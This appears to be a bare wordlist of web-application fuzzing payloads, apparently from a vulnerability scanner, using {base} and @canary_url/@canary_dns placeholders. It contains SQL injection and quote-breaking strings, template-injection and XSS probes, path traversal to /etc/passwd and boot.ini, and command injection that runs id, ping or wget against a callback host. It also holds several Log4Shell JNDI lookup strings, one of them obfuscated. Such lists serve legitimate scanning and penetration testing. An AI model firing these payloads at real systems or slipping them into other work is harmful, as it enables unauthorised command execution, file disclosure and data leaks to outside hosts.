'
''
\
\\
{base}-0
{base}*1
{base}'||'
{base}'+'
{base}' '
"
""
{base}"||"
{base}/*_*/
'{base}'
"{base}"
({base})
`
{base}'--
{base}')--
{base}'))--
{base}'#
{base}')#
{base}'))#
{base}' and 'z'='z
{base}' or 'z'='z
{base}" or "z"="z
}}
${77*77}
{{77*77}}
xsstest'"><
/{base}
./{base}
../{base}
../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\boot.ini
{base}))))))))))
{base}|| ping -i 30 @canary_dns ; x || ping -n 30 @canary_dns &
`id`
{base};echo 111111
{base}","x":"
{base}"],"x":["
{base},"x":1
{base}" a="
{base}" xmlns:xsi="
{base} a=""
{base}' a='
{base}' xmlns:xsi='
{base}<!--xx-->
<![CDATA[{base}]]>
<a>{base}</a>
{base} $(wget @canary_url)
& $(wget @canary_url)
|| wget @canary_url
${wget @canary_url}
%00
%a0
%0a
%0d
%08
%09
@canary_url
{base}"}{
#!/bin/bash%a0wget%20@canary_url
${$($([]/<\\n))}'"!&|&&||$}()%^:{}\+=\`$()</>]]]}}})))../../../\@#*.,;
${jndi:ldap://@canary_dns:1389/a}
${jndi:rmi://@canary_dns:1099/a}
${${::-J}n${::-d}i:ld${::-a}p://@canary_dns:1389}
